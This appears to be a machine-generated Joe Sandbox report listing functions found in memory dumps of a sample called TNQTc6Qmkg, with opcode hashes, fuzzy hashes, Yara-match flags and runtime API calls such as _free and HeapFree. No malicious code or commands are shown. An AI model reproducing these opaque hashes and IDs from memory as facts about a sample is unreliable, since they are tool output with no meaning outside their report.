                                                                                                                                                        • Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
                                                                                                                                                        • Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
                                                                                                                                                        • Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00409C12,05CF95DF), ref: 05CF9E72
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                        • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                        • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                        • Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
                                                                                                                                                        • Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                        • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                        • Instruction ID: 73593141549bc1491ed2aadfcb8b681d1ec934e572f4620e761828fb93460490
                                                                                                                                                        • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                        • Instruction Fuzzy Hash: C951552171874557EBF889788558BBEB3BAFB03204F180D1FDB43C7291EA05EB858396
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                        • Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                        • Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
                                                                                                                                                        • Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
                                                                                                                                                        • Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                        • Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                        • Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
                                                                                                                                                        • Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
                                                                                                                                                        • Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                        • Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
                                                                                                                                                        • Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
                                                                                                                                                        • Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                        • Instruction ID: 41a5a4821ded6b00d46ed0d7d22ddadd75a53710a1951b34ae713751e0e8e098
                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                        • Instruction Fuzzy Hash: EF917A7230D0A74ADBA9863E853447DFFF26A411A170A1B9ED5F3CA1C1EE14CA64D720
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                        • Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
                                                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                        • Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                        • Instruction ID: 9426a15e2589ac3317752e9b955604028e83e6c4c6251cb0ad0de7136c5acd57
                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                        • Instruction Fuzzy Hash: 9C91797330C0A74ADBA9823E957447DFFF26A416A170A0F9ED5F2CA1C5EE148A64D720
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                        • Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
                                                                                                                                                        • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                        • Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                        • Instruction ID: 88c730db5d912d574a9430c2f9eedc255b4057584c5aaa615e7bd36b5f098f0b
                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                        • Instruction Fuzzy Hash: 0A91897330D0A74ADBAD467E847447DFFE26A411A130A5B9ED5F3CB1C1ED14CA689720
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                        • Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
                                                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                        • Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                        • Instruction ID: bf83810307ca11f1d023be32db70834988aba74b1e348633c8d627fa8020c632
                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                        • Instruction Fuzzy Hash: D7816C7620C0974ADB9D863EC57447EFFE26A412A570A0B9DD5F3CB1C1EE148A54DB20
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                        • Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
                                                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                        • Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction ID: 441296fa5ed0d504f78c67fdd07c3bb3c71b614ad3173afac16f75cbf9a9e0ff
                                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                        • Instruction Fuzzy Hash: 9A118E72350100AFD754DF55EC84FA673EAEB89360B2980A9ED09CB312E676F881C760
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                        • Instruction ID: e92caf5c816a141ceabdb1f17ef2cc41dfdf7b1c85e2e71085a04d07197218ec
                                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                        • Instruction Fuzzy Hash: 8701A7766016049FDF61CF24C908FBA33E5FB85716F4548A5DA07A7242E774A941CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                        • Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                        • Instruction ID: 4646411b47c9355e57773a2c27e91b673a604c5e507b188b104f7979222b66bd
                                                                                                                                                        • Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
                                                                                                                                                        • Instruction Fuzzy Hash: 8CB1A075A012059FEB21DFB4C888BEEB7F5FF08300F14506EE995A7281DA75E945CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$Info
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                                        • Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                        • Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
                                                                                                                                                        • Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
                                                                                                                                                        • Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 05D0F7CC
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB38
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB4A
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB5C
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB6E
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB80
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB92
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBA4
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBB6
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBC8
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBDA
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBEC
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBFE
                                                                                                                                                          • Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EC10
                                                                                                                                                        • _free.LIBCMT ref: 05D0F7C1
                                                                                                                                                          • Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
                                                                                                                                                          • Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529
                                                                                                                                                        • _free.LIBCMT ref: 05D0F7E3
                                                                                                                                                        • _free.LIBCMT ref: 05D0F7F8
                                                                                                                                                        • _free.LIBCMT ref: 05D0F803
                                                                                                                                                        • _free.LIBCMT ref: 05D0F825
                                                                                                                                                        • _free.LIBCMT ref: 05D0F838
                                                                                                                                                        • _free.LIBCMT ref: 05D0F846
                                                                                                                                                        • _free.LIBCMT ref: 05D0F851
                                                                                                                                                        • _free.LIBCMT ref: 05D0F889
                                                                                                                                                        • _free.LIBCMT ref: 05D0F890
                                                                                                                                                        • _free.LIBCMT ref: 05D0F8AD
                                                                                                                                                        • _free.LIBCMT ref: 05D0F8C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                        • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                        • Instruction ID: fb173fa6eb658efb6334086bc32f029ece7eec7fb585c7844ec6799c899741ce
                                                                                                                                                        • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                        • Instruction Fuzzy Hash: 09313A71A047029FEB30AB79D888BAA77E9FF40310F24642BE459D61D4DF75E990C622
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0041F565
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
                                                                                                                                                          • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9
                                                                                                                                                        • _free.LIBCMT ref: 0041F55A
                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                        • _free.LIBCMT ref: 0041F57C
                                                                                                                                                        • _free.LIBCMT ref: 0041F591
                                                                                                                                                        • _free.LIBCMT ref: 0041F59C
                                                                                                                                                        • _free.LIBCMT ref: 0041F5BE
                                                                                                                                                        • _free.LIBCMT ref: 0041F5D1
                                                                                                                                                        • _free.LIBCMT ref: 0041F5DF
                                                                                                                                                        • _free.LIBCMT ref: 0041F5EA
                                                                                                                                                        • _free.LIBCMT ref: 0041F622
                                                                                                                                                        • _free.LIBCMT ref: 0041F629
                                                                                                                                                        • _free.LIBCMT ref: 0041F646
                                                                                                                                                        • _free.LIBCMT ref: 0041F65E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                                        • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                        • Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
                                                                                                                                                        • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                        • Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                        • Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
                                                                                                                                                        • Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                        • Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DecodePointer
                                                                                                                                                        • String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                        • API String ID: 3527080286-1021189420
                                                                                                                                                        • Opcode ID: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
                                                                                                                                                        • Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
